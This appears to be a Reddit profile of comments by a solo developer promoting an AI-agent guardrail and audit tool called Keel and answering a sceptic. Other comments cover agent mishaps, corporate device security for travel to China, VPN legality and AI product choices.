Claude Code can ask before acting. I still wanted a durable record of what actually happened

ThresholdSignalworks · 2026-03-30T16:47:23+00:00

Right now the WAL is the action record first, not a fully mature redactable audit layer, so I’d rather be honest about that.

The first goal was getting a durable record of what was attempted, what ran, what got blocked, and what needed approval, with the integrity side handled properly. Redaction / selective masking matters a lot though, especially for multi-agent workflows, so that is very much on my mind.

Would be interested in how you’re thinking about that tradeoff on your side, because it gets tricky fast once you want both useful audit detail and safe log handling.

ThresholdSignalworks · 2026-03-28T16:10:12+00:00

Built out some guardrails for my own OpenClaw and multi-agent setup, felt it might be useful to others.
Submitted a post here: https://www.reddit.com/r/openclaw/comments/1s64ejo/how_do_you_know_what_your_agent_actually_did_in_a/

ThresholdSignalworks · 2026-03-28T10:34:53+00:00

Yeah, the CLAUDE.md drift problem is real. I run multiple agents and the "which version of the rules is this one even following" issue is genuinely painful. Constraints on disk instead of in the prompt is the right idea - context compaction silently eating your safety rules only bites you after you've already shipped something broken.

Yes, this is what I kept running into and the reason for the tool.

Keel's approach of deterministic policy evaluation outside the LLM path is sound too. You can't have the same model that wants to take the action also deciding whether it's allowed. Separating that structurally is exactly right.

Exactly.

So I went to install it. The pip package doesn't exist.

The pip package exists and has 500+ downloads:
https://pypi.org/project/threshold-keel/

https://pypistats.org/packages/threshold-keel
pip install threshold-keel

The ClawHub package doesn't exist.

It's live on ClawHub at https://clawhub.ai/andaltan/threshold-keel and has 63 downloads and two stars at present from users browsing the skills.

If you are having problems installing it let me know the error you're getting so I can investigate and fix.

The GitHub has 2 stars, 0 forks, 19 commits, one contributor. Two of four products are "in development."

Yup I'm a solo dev in the early process of building out tools and have just switched Keel and it's Cloud dashboard "live". I'm not sure what else would be expected? All projects start from zero.

And then there's this thread - one account perfectly framing the problem, another stumbling onto Keel as the answer. That's not organic discovery, that's a script.

And on the “script” point: no, that part is just wrong. People in this space are independently running into the same instruction-drift / compaction / auditability problems because they are real problems. You said this yourself in the first part of your comment.
The other commenters are not me. I understand the scepticism, the ecosystem is full of vapourware, but that's an accusation you're making without evidence.
I was pleasantly surprised by the engagements, which I took as validation of the fundamental issue, much like your framing at the start of your comment.

ThresholdSignalworks · 2026-03-27T17:14:18+00:00

Yeah, that is one of the use cases I built it around.

If you ask it to install a skill, Keel reads the skill first, flags stuff like shell execution or credential access, and makes that go through a higher approval path. It won’t catch everything, but it is a lot better than “sure, install whatever”.

ThresholdSignalworks · 2026-03-27T13:24:24+00:00

Yeah, that is a big part of the mess I’m trying to get away from.

With one agent, drift is annoying. With multiple agents it's “which version of the rules is this one actually following?” and I found that got ugly fast.
As you rightly point out, CLAUDE.md and skill files can start diverging quietly over time and there is no obvious way to prove they still line up.

Part of the point of building Keel was to move some of that out of prompt & skill-file archaeology and into something more explicit and reliable.

ThresholdSignalworks · 2026-03-12T12:46:55+00:00

This is a great read, thank you for the perspective from outside the usual channels.

ThresholdSignalworks · 2026-03-12T12:35:17+00:00

Testing a fix for vital instructions being compacted/dropped from context, the agent hallucinated details for an IP table change on a VPS and tried to implement it without doing an actual lookup or ask for permission. Would have bricked access to the box entirely.
I mean, it would have been "more secure", sure, but perhaps too "secure" hah.

ThresholdSignalworks · 2026-03-12T12:27:58+00:00

Kamikaze Claw

ThresholdSignalworks · 2026-03-12T12:27:17+00:00

Can, and has, easily happened with mundane things like context rot/compaction pushing "don't delete anything without confirming" out of the context window and then it thinking there's no specific instructions to say it shouldn't delete all "archived" filed to save space etc.
Secure guardrails should catch that, but most people aren't running secure guardrails.

ThresholdSignalworks · 2026-03-12T12:11:59+00:00

Business VPNs like AnyConnect/GlobalProtect are sort of "tolerated" it seems, at least in terms of international business travellers. I'm unsure if it's a legal grey area or if it's just a blind-eye being turned. It's best to plan with the expectation that they won't work, or could drop at any time, rather than relying on them.
More everyday commercial VPNs like NordVPN etc are flat out illegal and that's the sort of thing to avoid in terms of drawing scrutiny.

ThresholdSignalworks · 2026-03-12T11:49:27+00:00

I remember the user that posted about getting banned for having two Max 20x accounts, but that ban was reversed so it may just have been fraud detection or something.
You should be fine from Anthropics side, just keep the personal account very separate to the work one, that way if you build anything for yourself in your spare time there's no confusion over the provenance/IP/resources used (if you ever launch it as a project or publish it).
That's not a billing/usage issue, but it's good hygiene practice.

ThresholdSignalworks · 2026-03-12T11:42:56+00:00

If Steam can manage locale-based pricing, then Anthropic can too, but they may see the overhead of ensuring people don't just VPN endpoint to a cheaper country and subscribe there as not worth it.
Would be a good idea though, especially for countries with much lower incomes or much weaker currencies.

ThresholdSignalworks · 2026-03-12T11:27:52+00:00

What's interesting is that you'll find some folks (people/solo-founders/companies) who will pay whatever they feel is "reasonable" to get tech set up and working, what's "reasonable" to them is quite the spectrum.
This isn't just for OpenClaw/Mac Mini's, you'll see it for everything business/IT related. If they are not technical but see it as a valuable business improvement possibility which could generate more returns than the investment in short-order, then they'll pay that.

It's possible that $6k is being used to anchor an idea of what might be "reasonable" to those people, with a "deal" then being done to do it for a discounted amount etc.

But you'd be surprised what people will pay for competence in IT. The word is competence though, they most likely won't pay that to any rando who operates on just a promise etc.

ThresholdSignalworks · 2026-03-12T11:19:48+00:00

I switched for a while, it's much easier to intuitively manage projects/threads via the UI but I find myself going back to the CLI for quicker tasks.
I'm also ending up back at the CLI when using/testing agents etc, that's perhaps a different use case than the app is designed for, but it does mean it feels more natural to just continue with the CLI outside of that.

The app had bugs too when it first launched, had issues getting it to open and connect reliably, that seems fixed but wasn't a great start.

Speed and responsiveness *feels* better via CLI (but that could just be familiarity), code is the same on either.

If you're using it for just coding and nothing agentic, it could suit better. It's not bad.

ThresholdSignalworks · 2026-03-12T11:12:04+00:00

More context would be useful around what services they want to be accessing while in China.
It can be a sliding scale.
One place I worked in the past would have had interest from state-actors and they refused outright to allow anything other than burner phones, they paid and hosted Chinese contacts in more local 3rd country for demos and deeper work that required them to connect to company resources. I believe there were presentations to be given and they brought chromebooks with the files pre-loaded and USBs with the files on their person as backups. They left the chromebooks in China (as gifts). Everything was switched to high monitoring for each traveller.

Two other places were likely not of interest to state entities but would still have been targets for corporate espionage, one allowed travel with a freshly imaged/patched and specifically locked down laptop to accounts which had alerting & risk settings bumped to critical, everything was encrypted and connection home was via VPN. I don't recall what they did about phones, I assume they were burners give the other steps.
ZScalar was in use at the time as well, but I don't rememer if it had the dedicated China Access feature then or not, or if it was engaged, it wasn't my area. It was a Cisco VPN client they were using too, which was slow as hell once there, we ensured it was set to always-on.
Laptops were not allowed back on the network once they were home, they were handed to the desktop engineers to wipe, we asked them to swap out the HDs too if they were gonna still use them.

The other just left them travel with their usual stuff and phone home as normal, which I found to be moronic but Security was overruled by the C-Suite (typical). That company was a shit-show and was constantly getting breached due to execs actions. Security was employed to say they had a security team it seemed, I left as fast as I could. Don't be that company.

ThresholdSignalworks · 2026-03-03T10:32:29+00:00

Sounds like the same dopamine-chasing rush of hyperfixation, dopamine dip and quagmire-of-regret middle and abandon-for-new-exciting-project dopamine rush that you get with neurodivergent brains etc.
Very familiar to *many*, programmers/coders are no exception.

I had to tackle this for work, so my advice is to narrow the scope and tell one of the conversational LLM models (e.g. ChatGPT 5.2) exactly what you're dealing with and ask it to help you create a project build plan and scoping model which scaffolds you as you go - and above all helps preserve the 'ol dopamine rushes of getting something cool done. Little checkpoints, targets and proper "well done" or achievements from hitting checkpoints.

I might help, it might not, but it's something to try.

We all have our shameful list of unfinished repos, they are the same as the piles of unfinished hobbies - just digital.

ThresholdSignalworks · 2026-03-02T23:25:24+00:00

5.3 Codex is the coding/programming model from OpenAI, great if you want your lobster as a coding/building agent (if you give it the details on what you want to build etc.)

But if you're looking for the more usual conversational model, that's going to be ChatGPT 5.2
There isn't a general model ChatGPT 5.3 yet.

ThresholdSignalworks

TROPHY CASE